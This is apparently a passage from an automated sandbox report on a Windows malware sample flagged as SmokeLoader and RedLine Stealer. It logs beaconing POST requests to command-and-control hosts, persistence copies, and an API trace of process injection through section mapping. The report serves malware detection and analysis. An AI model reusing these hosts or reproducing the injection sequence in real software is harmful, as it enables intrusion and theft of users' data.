Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://oqqsbiatqglrn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 176
Host: bestworldhools.com
Timestamp: 2024-10-07 13:00:16 UTC
Bytes transferred: 176
Direction: OUT
Data: Data Raw (176-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:00:18 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:00:17 GMT
Connection: close


Session ID: 3
Source IP: 192.168.2.5
Source Port: 50017
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:01:32 UTC
Bytes transferred: 290
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://xoybtutnnxkecaqf.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 262
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:01:32 UTC
Bytes transferred: 262
Direction: OUT
Data: Data Raw (262-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:01:32 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:01:32 GMT
Connection: close


Session ID: 4
Source IP: 192.168.2.5
Source Port: 50018
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:01:33 UTC
Bytes transferred: 288
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://cqxtjrqcgsayay.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 251
Host: bestworldhools.com
Timestamp: 2024-10-07 13:01:33 UTC
Bytes transferred: 251
Direction: OUT
Data: Data Raw (251-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:01:33 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:01:33 GMT
Connection: close


Session ID: 5
Source IP: 192.168.2.5
Source Port: 50020
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:01:54 UTC
Bytes transferred: 290
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://nihavgqtcpkgtcxt.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 111
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:01:54 UTC
Bytes transferred: 111
Direction: OUT
Data: Data Raw (111-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:01:55 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:01:55 GMT
Connection: close


Session ID: 6
Source IP: 192.168.2.5
Source Port: 50021
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:01:56 UTC
Bytes transferred: 286
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://uheybmputpop.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 267
Host: bestworldhools.com
Timestamp: 2024-10-07 13:01:56 UTC
Bytes transferred: 267
Direction: OUT
Data: Data Raw (267-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:01:56 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:01:56 GMT
Connection: close


Session ID: 7
Source IP: 192.168.2.5
Source Port: 50023
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:02:16 UTC
Bytes transferred: 285
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://glhqomjbdpj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 269
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:02:16 UTC
Bytes transferred: 269
Direction: OUT
Data: Data Raw (269-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:02:17 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:02:16 GMT
Connection: close


Session ID: 8
Source IP: 192.168.2.5
Source Port: 50024
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:02:17 UTC
Bytes transferred: 289
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://xnhhfayqvhtyngw.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 175
Host: bestworldhools.com
Timestamp: 2024-10-07 13:02:17 UTC
Bytes transferred: 175
Direction: OUT
Data: Data Raw (175-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:02:17 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:02:17 GMT
Connection: close


Session ID: 9
Source IP: 192.168.2.5
Source Port: 50026
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:02:39 UTC
Bytes transferred: 287
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://hptbtnqwmmhbw.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 264
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:02:39 UTC
Bytes transferred: 264
Direction: OUT
Data: Data Raw (264-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:02:40 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:02:39 GMT
Connection: close


Session ID: 10
Source IP: 192.168.2.5
Source Port: 50027
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:02:40 UTC
Bytes transferred: 290
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://klstdrudvxhgouey.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 278
Host: bestworldhools.com
Timestamp: 2024-10-07 13:02:40 UTC
Bytes transferred: 278
Direction: OUT
Data: Data Raw (278-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:02:41 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:02:40 GMT
Connection: close


Session ID: 11
Source IP: 192.168.2.5
Source Port: 50029
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:03:02 UTC
Bytes transferred: 286
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://dtojnsdaxdil.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 300
Host: calvinandhalls.com
Timestamp: 2024-10-07 13:03:02 UTC
Bytes transferred: 300
Direction: OUT
Data: Data Raw (300-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:03:02 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:03:02 GMT
Connection: close


Session ID: 12
Source IP: 192.168.2.5
Source Port: 50030
Destination IP: 188.40.141.211
Destination Port: 443
PID: 1028
Process: C:\Windows\explorer.exe

Timestamp: 2024-10-07 13:03:03 UTC
Bytes transferred: 286
Direction: OUT
Data:
POST /search.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://mwlktdttfgqo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 270
Host: bestworldhools.com
Timestamp: 2024-10-07 13:03:03 UTC
Bytes transferred: 270
Direction: OUT
Data: Data Raw (270-byte binary request body; hex dump omitted)
Timestamp: 2024-10-07 13:03:03 UTC
Bytes transferred: 163
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Content-Length: 0
Content-Type: application/octet-stream
Date: Mon, 07 Oct 2024 13:03:03 GMT
Connection: close


Target ID: 0
Start time: 08:58:55
Start date: 07/10/2024
Path: C:\Users\user\Desktop\BzLGqYKy7o.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\BzLGqYKy7o.exe"
Imagebase: 0x400000
File size: 447'488 bytes
MD5 hash: D0D4805488E7E745515FFF2165D3CC05
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2133342006.000000000059E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2132079925.00000000004F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2132356094.0000000000561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2132022634.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

Target ID: 2
Start time: 08:59:01
Start date: 07/10/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                        Target ID:4
                                        Start time:08:59:20
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\teihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\teihrdr
                                        Imagebase:0x400000
                                        File size:447'488 bytes
                                        MD5 hash:D0D4805488E7E745515FFF2165D3CC05
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2369233302.000000000068D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2369070542.0000000000610000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2369106614.0000000000631000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2369051681.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 32%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:7
                                        Start time:08:59:47
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Local\Temp\B9A0.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\B9A0.exe
                                        Imagebase:0x400000
                                        File size:445'952 bytes
                                        MD5 hash:0719C6940AABCC832DB40F7EE68A25DC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2645309546.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2645014782.0000000001FA0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000007.00000002.2645253603.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000007.00000003.2593902376.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2644866394.000000000058D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:09:00:01
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\teihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\teihrdr
                                        Imagebase:0x400000
                                        File size:447'488 bytes
                                        MD5 hash:D0D4805488E7E745515FFF2165D3CC05
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2780852032.00000000020C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.2780779918.000000000072F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000008.00000002.2780906751.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.2780540702.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Reputation:low
                                        Has exited:true

                                        Target ID:9
                                        Start time:09:00:11
                                        Start date:07/10/2024
                                        Path:C:\Users\user\AppData\Roaming\jtihrdr
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\jtihrdr
                                        Imagebase:0x400000
                                        File size:445'952 bytes
                                        MD5 hash:0719C6940AABCC832DB40F7EE68A25DC
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000003.2830678754.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2882578584.000000000057D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2882405099.0000000000530000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2882830547.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2882377555.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                          Execution Graph

                                          Execution Coverage:7.9%
                                          Dynamic/Decrypted Code Coverage:42.6%
                                          Signature Coverage:43.4%
                                          Total number of Nodes:122
                                          Total number of Limit Nodes:4
                                          execution_graph 3457 402e40 3459 402e37 3457->3459 3460 402edf 3459->3460 3461 4018e6 3459->3461 3462 4018f5 3461->3462 3463 40192e Sleep 3462->3463 3464 401949 3463->3464 3466 40195a 3464->3466 3467 401514 3464->3467 3466->3460 3468 401524 3467->3468 3469 4015c4 NtDuplicateObject 3468->3469 3470 4016e0 3468->3470 3469->3470 3471 4015e1 NtCreateSection 3469->3471 3470->3466 3472 401661 NtCreateSection 3471->3472 3473 401607 NtMapViewOfSection 3471->3473 3472->3470 3474 40168d 3472->3474 3473->3472 3475 40162a NtMapViewOfSection 3473->3475 3474->3470 3476 401697 NtMapViewOfSection 3474->3476 3475->3472 3477 401648 3475->3477 3476->3470 3478 4016be NtMapViewOfSection 3476->3478 3477->3472 3478->3470 3578 401542 3579 40153b 3578->3579 3580 4015c4 NtDuplicateObject 3579->3580 3584 4016e0 3579->3584 3581 4015e1 NtCreateSection 3580->3581 3580->3584 3582 401661 NtCreateSection 3581->3582 3583 401607 NtMapViewOfSection 3581->3583 3582->3584 3585 40168d 3582->3585 3583->3582 3586 40162a NtMapViewOfSection 3583->3586 3585->3584 3587 401697 NtMapViewOfSection 3585->3587 3586->3582 3588 401648 3586->3588 3587->3584 3589 4016be NtMapViewOfSection 3587->3589 3588->3582 3589->3584 3502 5afa30 3503 5afa3f 3502->3503 3506 5b01d0 3503->3506 3511 5b01eb 3506->3511 3507 5b01f4 CreateToolhelp32Snapshot 3508 5b0210 Module32First 3507->3508 3507->3511 3509 5b021f 3508->3509 3512 5afa48 3508->3512 3513 5afe8f 3509->3513 3511->3507 3511->3508 3514 5afeba 3513->3514 3515 5afecb VirtualAlloc 3514->3515 3516 5aff03 3514->3516 3515->3516 3516->3516 3517 4e0005 3522 4e092b GetPEB 3517->3522 3519 4e0030 3524 4e003c 3519->3524 3523 4e0972 3522->3523 3523->3519 3525 4e0049 3524->3525 3526 4e0e0f 2 API calls 3525->3526 3527 4e0223 3526->3527 3528 4e0d90 GetPEB 3527->3528 3529 4e0238 VirtualAlloc 3528->3529 3530 4e0265 3529->3530 3531 4e02ce VirtualProtect 3530->3531 3533 4e030b 3531->3533 3532 4e0439 VirtualFree 3536 4e04be LoadLibraryA 3532->3536 
3533->3532 3535 4e08c7 3536->3535 3537 4e0001 3538 4e0005 3537->3538 3539 4e092b GetPEB 3538->3539 3540 4e0030 3539->3540 3541 4e003c 7 API calls 3540->3541 3542 4e0038 3541->3542 3637 402dd0 3638 402ddc 3637->3638 3639 4018e6 8 API calls 3638->3639 3640 402edf 3638->3640 3639->3640 3559 4018f1 3560 4018f6 3559->3560 3561 40192e Sleep 3560->3561 3562 401949 3561->3562 3563 401514 7 API calls 3562->3563 3564 40195a 3562->3564 3563->3564 3479 4e003c 3480 4e0049 3479->3480 3492 4e0e0f SetErrorMode SetErrorMode 3480->3492 3485 4e0265 3486 4e02ce VirtualProtect 3485->3486 3488 4e030b 3486->3488 3487 4e0439 VirtualFree 3491 4e04be LoadLibraryA 3487->3491 3488->3487 3490 4e08c7 3491->3490 3493 4e0223 3492->3493 3494 4e0d90 3493->3494 3495 4e0dad 3494->3495 3496 4e0dbb GetPEB 3495->3496 3497 4e0238 VirtualAlloc 3495->3497 3496->3497 3497->3485 3624 401915 3625 4018c6 3624->3625 3626 40191a 3624->3626 3627 40192e Sleep 3626->3627 3628 401949 3627->3628 3629 401514 7 API calls 3628->3629 3630 40195a 3628->3630 3629->3630 3498 402f97 3499 4030ee 3498->3499 3500 402fc1 3498->3500 3500->3499 3501 40307c RtlCreateUserThread NtTerminateProcess 3500->3501 3501->3499 3614 402d7b 3617 402d38 3614->3617 3615 402dc7 3616 4018e6 8 API calls 3616->3615 3617->3614 3617->3615 3617->3616 3555 5afa24 3556 5afa30 3555->3556 3557 5b01d0 3 API calls 3556->3557 3558 5afa48 3557->3558 3565 4014fe 3566 401506 3565->3566 3567 401531 3565->3567 3568 4015c4 NtDuplicateObject 3567->3568 3572 4016e0 3567->3572 3569 4015e1 NtCreateSection 3568->3569 3568->3572 3570 401661 NtCreateSection 3569->3570 3571 401607 NtMapViewOfSection 3569->3571 3570->3572 3573 40168d 3570->3573 3571->3570 3574 40162a NtMapViewOfSection 3571->3574 3573->3572 3575 401697 NtMapViewOfSection 3573->3575 3574->3570 3576 401648 3574->3576 3575->3572 3577 4016be NtMapViewOfSection 3575->3577 3576->3570 3577->3572

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 85 401514-401533 87 401524-40152f 85->87 88 401536-40156e call 401193 85->88 87->88 97 401570 88->97 98 401573-401578 88->98 97->98 100 401898-4018a0 98->100 101 40157e-40158f 98->101 100->98 106 4018a5-4018b7 100->106 104 401595-4015be 101->104 105 401896 101->105 104->105 114 4015c4-4015db NtDuplicateObject 104->114 105->106 111 4018c5 106->111 112 4018bc-4018e3 call 401193 106->112 111->112 114->105 117 4015e1-401605 NtCreateSection 114->117 119 401661-401687 NtCreateSection 117->119 120 401607-401628 NtMapViewOfSection 117->120 119->105 122 40168d-401691 119->122 120->119 123 40162a-401646 NtMapViewOfSection 120->123 122->105 124 401697-4016b8 NtMapViewOfSection 122->124 123->119 126 401648-40165e 123->126 124->105 127 4016be-4016da NtMapViewOfSection 124->127 126->119 127->105 130 4016e0 call 4016e5 127->130
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                          • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$View$Create$DuplicateObject
                                          • String ID:
                                          • API String ID: 1546783058-0
                                          • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                          • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                          • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                          Control-flow Graph

                                          control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 153 4018a5-4018b7 147->153 151 401595-4015be 148->151 152 401896 148->152 151->152 161 4015c4-4015db NtDuplicateObject 151->161 152->153 158 4018c5 153->158 159 4018bc-4018e3 call 401193 153->159 158->159 161->152 164 4015e1-401605 NtCreateSection 161->164 166 401661-401687 NtCreateSection 164->166 167 401607-401628 NtMapViewOfSection 164->167 166->152 169 40168d-401691 166->169 167->166 170 40162a-401646 NtMapViewOfSection 167->170 169->152 171 401697-4016b8 NtMapViewOfSection 169->171 170->166 173 401648-40165e 170->173 171->152 174 4016be-4016da NtMapViewOfSection 171->174 173->166 174->152 177 4016e0 call 4016e5 174->177
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2131322450.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_BzLGqYKy7o.jbxd
                                          Similarity
                                          • API ID: Section$CreateDuplicateObjectView
                                          • String ID:
                                          • API String ID: 1652636561-0
                                          • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                          • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                          • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                          Control-flow Graph

                                          control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 205 4015c4-4015db NtDuplicateObject 195->205 196->197 202 4018c5 197->202 203 4018bc-4018e3 call 401193 197->203 202->203 205->196 208 4015e1-401605 NtCreateSection 205->208 210 401661-401687 NtCreateSection 208->210 211 401607-401628 NtMapViewOfSection 208->211 210->196 213 40168d-401691 210->213 211->210 214 40162a-401646 NtMapViewOfSection 211->214 213->196 215 401697-4016b8 NtMapViewOfSection 213->215 214->210 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->210 218->196 221 4016e0 call 4016e5 218->221
                                          APIs
                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                          • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
